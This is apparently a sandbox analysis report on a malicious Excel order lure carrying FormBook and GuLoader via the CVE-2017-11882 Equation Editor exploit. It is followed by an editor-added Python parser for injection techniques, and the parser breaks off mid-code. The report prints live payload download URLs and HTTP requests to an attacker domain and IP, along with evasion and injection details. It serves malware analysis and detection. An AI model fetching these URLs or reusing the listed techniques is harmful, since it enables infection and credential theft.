Analysis Report Unique food order.xlsx

Overview

General Information

Sample Name: Unique food order.xlsx
Analysis ID: 320235
MD5: f2cd263042fce1a4c2cbeed5f1676429
SHA1: 608334d6c55e50f3447f865bca59e05b7b60e0cb
SHA256: f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
Tags: VelvetSweatshopxlsx

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Unique food order.xlsx Virustotal: Detection: 24%
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_00097295
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_000972A5
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5F9F InternetReadFile, 5_2_001B5F9F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown DNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: vbc.exe String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B EnumWindows,NtSetInformationThread, 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA, 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315A6C NtProtectVirtualMemory, 4_2_00315A6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA, 4_2_003106B1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315336 NtSetInformationThread,LoadLibraryA, 4_2_00315336
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031232A NtWriteVirtualMemory, 4_2_0031232A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315F9F NtResumeThread, 4_2_00315F9F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess, 4_2_0031078C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315435 NtWriteVirtualMemory, 4_2_00315435
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316039 NtResumeThread, 4_2_00316039
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316015 NtResumeThread, 4_2_00316015
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312455 NtWriteVirtualMemory, 4_2_00312455
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104B2 NtSetInformationThread, 4_2_003104B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_003124BD NtWriteVirtualMemory, 4_2_003124BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316089 NtResumeThread, 4_2_00316089
Source: C:\Users\Public\vbc.exe Code function: 4_2_003160D1 NtResumeThread, 4_2_003160D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104CD NtSetInformationThread, 4_2_003104CD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312531 NtWriteVirtualMemory, 4_2_00312531
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310537 NtSetInformationThread, 4_2_00310537
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310516 NtSetInformationThread, 4_2_00310516
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316106 NtResumeThread, 4_2_00316106
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031059D NtSetInformationThread, 4_2_0031059D
Source: C:\Users\Public\vbc.exe Code function: 4_2_003161ED NtResumeThread, 4_2_003161ED
Source: C:\Users\Public\vbc.exe Code function: 4_2_003105D9 NtSetInformationThread, 4_2_003105D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316239 NtResumeThread, 4_2_00316239
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031260D NtWriteVirtualMemory, 4_2_0031260D
Source: C:\Users\Public\vbc.exe Code function: 4_2_003162C5 NtResumeThread, 4_2_003162C5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316325 NtResumeThread, 4_2_00316325
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312705 NtWriteVirtualMemory, 4_2_00312705
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310F7D NtWriteVirtualMemory, 4_2_00310F7D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031276A NtWriteVirtualMemory, 4_2_0031276A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315FE5 NtResumeThread, 4_2_00315FE5
Source: C:\Users\Public\vbc.exe Code function: 4_2_003147EF NtSetInformationThread, 4_2_003147EF
Source: C:\Users\Public\vbc.exe Code function: 4_2_003123D5 NtWriteVirtualMemory, 4_2_003123D5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315FC1 NtResumeThread, 4_2_00315FC1
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B EnumWindows,NtSetInformationThread, 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA, 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315A6C NtProtectVirtualMemory, 4_2_00315A6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA, 4_2_003106B1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315336 NtSetInformationThread,LoadLibraryA, 4_2_00315336
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031232A NtWriteVirtualMemory, 4_2_0031232A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315F9F NtResumeThread, 4_2_00315F9F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess, 4_2_0031078C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315435 NtWriteVirtualMemory, 4_2_00315435
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316039 NtResumeThread, 4_2_00316039
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316015 NtResumeThread, 4_2_00316015
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312455 NtWriteVirtualMemory, 4_2_00312455
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104B2 NtSetInformationThread, 4_2_003104B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_003124BD NtWriteVirtualMemory, 4_2_003124BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316089 NtResumeThread, 4_2_00316089
Source: C:\Users\Public\vbc.exe Code function: 4_2_003160D1 NtResumeThread, 4_2_003160D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003104CD NtSetInformationThread, 4_2_003104CD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312531 NtWriteVirtualMemory, 4_2_00312531
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310537 NtSetInformationThread, 4_2_00310537
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_1E98FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_1E98FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FFB4 NtCreateSection,LdrInitializeThunk, 5_2_1E98FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_1E98FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_1E98FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FD8C NtDelayExecution,LdrInitializeThunk, 5_2_1E98FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_1E98FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_1E98FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_1E98FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_1E98FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_1E98FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F900 NtReadFile,LdrInitializeThunk, 5_2_1E98F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9900C4 NtCreateFile,LdrInitializeThunk, 5_2_1E9900C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_1E990048
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk, 5_2_1E990078
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FE24 NtWriteVirtualMemory, 5_2_1E98FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FFFC NtCreateProcessEx, 5_2_1E98FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FF34 NtQueueApcThread, 5_2_1E98FF34
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC30 NtOpenProcess, 5_2_1E98FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC48 NtSetInformationFile, 5_2_1E98FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990C40 NtGetContextThread, 5_2_1E990C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991D80 NtSuspendThread, 5_2_1E991D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FD5C NtEnumerateKey, 5_2_1E98FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FAB8 NtQueryValueKey, 5_2_1E98FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FA20 NtQueryInformationFile, 5_2_1E98FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FA50 NtEnumerateValueKey, 5_2_1E98FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FBE8 NtQueryVirtualMemory, 5_2_1E98FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FB50 NtCreateKey, 5_2_1E98FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F8CC NtWaitForSingleObject, 5_2_1E98F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F9F0 NtClose, 5_2_1E98F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98F938 NtWriteFile, 5_2_1E98F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991930 NtSetContextThread, 5_2_1E991930
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9907AC NtCreateMutant, 5_2_1E9907AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9910D0 NtOpenProcessToken, 5_2_1E9910D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990060 NtQuerySection, 5_2_1E990060
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9901D4 NtSetValueKey, 5_2_1E9901D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99010C NtOpenDirectoryObject, 5_2_1E99010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991148 NtOpenThread, 5_2_1E991148
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5A6C NtProtectVirtualMemory, 5_2_001B5A6C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B00C4 NtCreateFile,LdrInitializeThunk, 9_2_020B00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B07AC NtCreateMutant,LdrInitializeThunk, 9_2_020B07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_020AFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_020AFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_020AFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF900 NtReadFile,LdrInitializeThunk, 9_2_020AF900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF9F0 NtClose,LdrInitializeThunk, 9_2_020AF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_020AFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_020AFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0048 NtProtectVirtualMemory, 9_2_020B0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0060 NtQuerySection, 9_2_020B0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0078 NtResumeThread, 9_2_020B0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B10D0 NtOpenProcessToken, 9_2_020B10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B010C NtOpenDirectoryObject, 9_2_020B010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1148 NtOpenThread, 9_2_020B1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B01D4 NtSetValueKey, 9_2_020B01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFA20 NtQueryInformationFile, 9_2_020AFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFA50 NtEnumerateValueKey, 9_2_020AFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFAB8 NtQueryValueKey, 9_2_020AFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFB50 NtCreateKey, 9_2_020AFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFBB8 NtQueryInformationToken, 9_2_020AFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFBE8 NtQueryVirtualMemory, 9_2_020AFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF8CC NtWaitForSingleObject, 9_2_020AF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AF938 NtWriteFile, 9_2_020AF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1930 NtSetContextThread, 9_2_020B1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFE24 NtWriteVirtualMemory, 9_2_020AFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFEA0 NtReadVirtualMemory, 9_2_020AFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFF34 NtQueueApcThread, 9_2_020AFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFFB4 NtCreateSection, 9_2_020AFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFFFC NtCreateProcessEx, 9_2_020AFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC30 NtOpenProcess, 9_2_020AFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC48 NtSetInformationFile, 9_2_020AFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B0C40 NtGetContextThread, 9_2_020B0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC60 NtMapViewOfSection, 9_2_020AFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFC90 NtUnmapViewOfSection, 9_2_020AFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFD5C NtEnumerateKey, 9_2_020AFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFD8C NtDelayExecution, 9_2_020AFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1D80 NtSuspendThread, 9_2_020B1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099D50 NtCreateFile, 9_2_00099D50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099E00 NtReadFile, 9_2_00099E00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099E80 NtClose, 9_2_00099E80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099F30 NtAllocateVirtualMemory, 9_2_00099F30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099D4B NtCreateFile, 9_2_00099D4B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099DA4 NtCreateFile, 9_2_00099DA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099DFE NtReadFile, 9_2_00099DFE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099E7A NtClose, 9_2_00099E7A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00099F2B NtAllocateVirtualMemory, 9_2_00099F2B
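The native-API call sites listed above are the raw material behind the sandbox's injection and anti-debug verdicts: NtWriteVirtualMemory followed by NtResumeThread in the first vbc.exe instance, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread together in the second (the classic hollowing sequence), and NtQueueApcThread in both the second vbc.exe and the NAPSTAT.EXE host. The script below is an added example, not part of the Joe Sandbox report: it parses "Code function" lines in exactly this report's format, aggregates the Nt* APIs per sandbox process (the leading `N_2_` is the sandbox's process identifier), and labels API combinations with the technique they usually implement. The technique table and the choice of sample lines are the editor's assumptions; note that NtSetInformationThread on its own cannot distinguish ThreadHideFromDebugger from a benign priority or affinity change, which is why it is reported as "possibly".

```python
import re
from collections import defaultdict

# Report line shape: "Source: <image> Code function: <proc>_<addr> <api>,<api>, <proc>_<addr>"
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: (?P<proc>\d+_\d+)_(?P<addr>[0-9A-Fa-f]+)"
    r"\s*(?P<apis>[A-Za-z0-9_,]*?),?\s*\d+_\d+_[0-9A-Fa-f]+$"
)

# Editor's mapping (an assumption, not the sandbox's rule set): a technique is
# reported for a process when every API in the set is seen somewhere in it.
TECHNIQUES = [
    ("thread hiding (NtSetInformationThread, possibly ThreadHideFromDebugger)",
     frozenset({"NtSetInformationThread"})),
    ("process hollowing",
     frozenset({"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                "NtSetContextThread", "NtResumeThread"})),
    ("APC injection", frozenset({"NtQueueApcThread", "NtWriteVirtualMemory"})),
    ("section mapping injection", frozenset({"NtCreateSection", "NtMapViewOfSection"})),
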